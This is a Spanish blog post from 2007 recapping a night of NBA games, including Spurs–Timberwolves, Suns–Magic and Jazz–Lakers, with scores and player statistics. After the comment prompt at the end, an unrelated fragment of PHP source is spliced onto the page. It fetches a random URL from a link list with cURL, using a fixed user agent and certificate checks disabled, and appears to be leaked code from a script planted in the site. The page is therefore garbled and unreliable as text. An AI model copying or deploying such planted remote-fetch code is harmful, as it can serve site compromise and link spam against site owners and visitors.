La crónica (30/11/07)

01 de December de 2007 por xapa_croack

Noche de muchos partidos en la NBA. Los Spurs hundieron un poquito más a los Wolves en el pozo de la clasificación, los Mavericks demostraron que también pueden vencer sin Dirk (que jugó pero no estuvo), los Suns vencieron de nuevo a los Magics, Durant anotó 35 puntos en la victoria de Seattle sobre Indiana, Calderón sigue su con sus buenas actuaciones como titular, Philadelphia firma su peor actuación en triples de la historia y los Jazz infligieron una dura derrota a los Lakers. Todo esto y mucho más, en la crónica.

Spurs 106 – 91 Timberwolves

Tremendo el impacto que está dando Manu Ginobili desde el banco, siguiendo así pocos rivales tendrá en la lucha por el mejor 6º hombre de la liga. Esta noche con 31 puntos con 7/9 en triples senteció a los wolves a su duodécima derrota de la temporada, cerrando el partido con un terrorífico parcial 40-11. Manudo es el único jugador que promedia más de 18 puntos por partido en menos de 30 minutos de juego. Duncan terminó con 20-14 solo falló 2 tiros en los primeros 31 minutos de partido, el francés Parker con 17 y 9 asistencias, Bowen en su faena metiendo 3/6 en triples ayudo con 10 puntos. Por los jóvenes wolves Al Jefferson con 23-11, Telfair, reemplazando al lesionado McCants contribuyó con 17 tantos, 4 asistencias y 2 robos fueron los mejores aunque Craig Smith desde el banco cumplió con 10 puntos. Los Spurs continúan siendo el mejor equipo del Oeste y Minessota el peor.

Blazers 80 – 91 Mavericks

Josh Howard se erigió como mejor hombre del partido gracias a los 23 puntos y 14 rebotes, el MVP de la liga tuvo su partido flojo con 11 puntos y solo 2 rebotes pero con la ayuda de Terry 17 puntos y Harris 14 y 7 asistencias tuvieron suficiente para ganar a unos pobres Trail Blazers. Lamarcus Aldridge motivado, quizás, gracias a sus 45 entradas que repartió entre sus familiares y amigos ya que es nativo de Texas, se marcó una gran defensa sobre Dirk, al cual le dejo en 5/15 además aporto 22 puntos, 12 rebotes y 5 tapones. Del resto de Oregon destacó Blake12 y 5 asistencias y Spanish Chocolate con 10 puntos y 5 asistencias en 15 minutos, el ROY del año pasado solo pudo ayudar con 8 puntos, el bagaje de los de Portland fuera de casa es de 0-8.

Magic 106 – 110 Suns

De las cuatro derrotas de los magicos esta temporada, dos provienen de los Suns, la otra vez fue un 10 de noviembre, en la batalla los dos mejores jóvenes pivots Amare vs Howard, y la partida fue de parte de Dwight con 30 puntos y 23 rebotes, segundo partido que hace 30-20, vaya monstruo afirmo D´Antoni, sus 8 perdidas lastraron a su equipo que solo estuvo acompañado por el turco 25-8-6 y Lewis con 18-5, el resto de jugadores no pasaron de 8 puntos, este último tuvo el triple que hubiera aventajado a los visitantes a falta de 6 segundos pero falló y en la siguiente jugada a Nash le hicieron una falta y decidió con 2 tiros libres. Los chicos D´Antoni estuvieron geniales con seis jugadores con 15 o mas puntos la manija fue otra vez del canadiense Nash 15 puntos y 14 asistencias, Marion 17-9 y 4 tapones Amare 19-10, Barbosa 17, Bell que estaba dudoso al final cumplió e hizo el mejor partido de su temporada con 20-6.

Pacers 93 -95 Supersonics

Por fin los aficionados de los Sonics pudieron presenciar en su estadio una victoria de su equipo, último equipo en la liga en conseguirlo, además de disfrutar de su nueva estrella Kevin Durant que reportó 35 puntos, por ahora tope de su corta carrera, 5 rebotes y 3 tapones, seguidos por el otro novato Green y Wilcox con 12 puntos cada uno, Kurt Thomas con 18 rebotes gano la faceta reboteadora del encuentro, teniendo en la enfermería a Colison, Petro y Swift
Durant con 2 tiros libres finales sentenció el partido, anotando todos los puntos de su equipo en los últimos 2 minutos.En los Pacers Danny Granger con 21 puntos 7 rebotes fue el mejor, Dunleavy se quedó con 14 y el jugador de segundo año Shawne Williams con 13, la estrella Maine que volvía después de perderse 5 partidos por problemas en la rodilla se quedó con 12 puntos y 10 rebotes.

Clippers 107 – 123 Nuggets

Los Clippers continúan sin encontrar la senda ganadora y perdieron su sexto partido de las ultimas siete contiendas esta vez tuvieron enfrente a un gran AI3 con 26 puntos 7 asistencias, Melo también ayudo con su 24 puntos 6 asistencias 4 rebotes y 3 robos, y cuando estas estrellas empiezan a pasar el balón se nota. Desde el banco JR Smith con seis triples (6/9 triples) ayudo con 22 puntos, esta vez el “carpanta” del partido fue para Camby con 12. Anthony Carter en su segundo partido como titular ayudo con 8 puntos y 10 asistencias. Los Nuggets siguen cautos con la rodilla de Kenyon Martin, el cual se ha perdido 106 partidos en las ultimas 2 temporadas, y ayer solo disputo 32 minutos anotando 9 puntos y 5 rebotes. Por los visitantes se salvo Maggette con 26 puntos 4 rebotes y 5 asistencias, segundo partido que juega después de su lesión, Kaman mermado a faltas todo el partido con 16 puntos pero se quedo a un rebote del doble-doble, Tim Thomas y Brevin Knight titular, con la baja de Casselmania que se lesionó en un golpe con Rafel Alston, hizo su mejor partido de la temporada con 13 puntos 6 asistencias. El rookie Al Thorton fue el mejor del banco con 11 puntos con 2 triples.

Cavaliers 82 – 91 Raptors

Partido de las ausencias el jugado en Toronto debido a las bajas por lesión de Lebron James y Chris Bosh. Pero su hueco no quedó vacio y Daniel Gibson con 24 puntos y Gooden con 15 puntos y 14 rebotes por parte de los Cavs y Bargani y Delfino con más de 24 puntos cada uno, por parte de los Raptors, se irigieron en figuras de sus respectivos equipos. Calderón volvió a hacer un gran partido como titular con 11 puntos y 10 asistencias habiendo realizado un doble-doble en los últimos 4 partidos, todos jugadores como titular en ausencia de TJ Ford. Precisamente, contra los Cavs jugó su primer partido tras la lesión contabilanzando 6 asistencias y 2 puntos en 16 minutos. Esperemos que Sam Mitchell haya tomado debido cuenta de las prestaciones de Calderon que sería base titular en casi cualquier franquicia de la NBA.

Wizards 84 – 85 76ers

Ni siquiera la peor noche de la historia en el tiro de Philadelphia provocó su derrota. Con 0 de 14 en triples, los 76ers igualaron el récord de la franquicia que databa de 1988. La estrella de esta horrible estadística fue Andre Iguodala que falló los 6 triples que intentó y acabó el partido con 3 de 19 tiros de campo convertidos con una racha de 16 intentos fallidos seguidos. Y aun así ganaron, sobretodo gracias a una buena defensa y al buen hacer de Dalembert y Andre Miller. El partido llegó igualado a los segundos finales e incluso los Wizards tuvieron una oportunidad de ganar pero Nick Young falló el triple que les hubiera dado la victoria. En Washigton destacaron de nuevo Butler y Jamison, secundados esta vez por Nick Young y Antonio Daniels, jugadores que en ausencia de Gilbert Arenas han aumentado su protagonismo.

Bucks 88 – 91 Knicks

Los Bucks se dejaron recuperar una diferencia de 17 puntos y fallaron los 2 últimos triples que hubieran mandado el partido a la prórroga. Los Knicks, en cambio, quisieron limpiar su imagen y con Crawford y Randolph (25 puntos ambos) como estiletes lucharon hasta alcanzar la victoria al final del encuentro. Marbury contribuyó con 13 puntos hasta que tuvo que dejar el partido mediado el tercer cuarto por culpa de una lesión en su hombro. Durante todo el partido resonaron en el Madison Square Garden gritos en contra de Isiah y pidiendo su inmediato despido. Al término del partido Jamaal Crawford se encaminó al centro de la cancha y en nombre de todos los jugadores de los Knics pidió perdón a los aficionados por su lamentable actuación en su anterior partido.

Hornets 92 – 86 Hawks

Los Hornets siguen con su buena racha en partidos a domicilio y aumentan a 8-2 su balance fuera de casa. Esta vez se sobrepusieron a la baja en la segunda parte de Tyson Chandler debido a un golpe q le hizo perder 2 dientes y con West como figura destacada consiguieron derrotar a Atlanta. El equipo de Georgia no jugó un mal partido pero perdió 19 balones, hecho que lastró sus aspiraciones de victoria. Josh Smith y Al Horford fueron sus jugadores más destacados.

Lakers 96 – 120 Jazz

Kirilenko tenía cosas que demostrar a Sloan y los Lakers pagaron los platos rotos. Los Jazz recibían a los Lakers sin Boozer ni Okur, así que Deron Williams puso los puntos y AK47 puso todo lo demás. 35 puntos del base, que anotó incontables bandejas sin apenas oposición, y toda una exhibición del ruso, 20 puntos, 11 rebotes, 11 asistencias, 6 robos y 4 tapones, fueron demasiado para los angelinos, en los que sólo Kobe y Farmar hicieron buenos partidos. Las paupérrimas actuaciones tanto en ataque como en defensa de Fisher y, especialmente, un Odom superado en todo momento por Kirilenko, pesaron mucho en unos Lakers que no encontraron la forma de frenar a un rival que hubo de recurrir a jugadores como el rookie Fesenko, que en su debut logró 6 puntos, 7 rebotes y se marchó con un corte en la cara tras un choque con Mihm.

Celtics 95 – 85 Heat

Contra el mejor equipo de la liga has de jugar al 100% si quieres ganar. Por segunda vez en 2 semanas contra los Celtics los Heat no solo no lo hicieron sino que jugaron uno de sus peores partidos. Y eso que era probable que con un poco más de acierto, como mínimo podrían haber puesto en serios apuros al equipo de Boston. Ray Allen acabó el partido con 3 de 17 después de haber errado 12 de 13 tiros en 8 minutos y medio, Pierce acabó con 27 puntos pero con 6 pérdidas y porcentajes por debajo del 40%, Garnett jugó un buen partido pero no estuvo mayestático y el banquillo casi no existió. A pesar de esto los Heat no amenazaron en ningún momento la victoria verde debido sobretodo al pobre partido de Wade que aun no se ha recuperado al 100% de la lesión que le obligó a perderse los primeros partidos de la temporada. Destacaron por Miami, Udonis Haslem con 18 puntos y 10 rebotes, Jason Williams saliendo desde el banquillo para acabar con 22 puntos y Shaquille O’Neal con 13 puntos y 11 rebotes.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>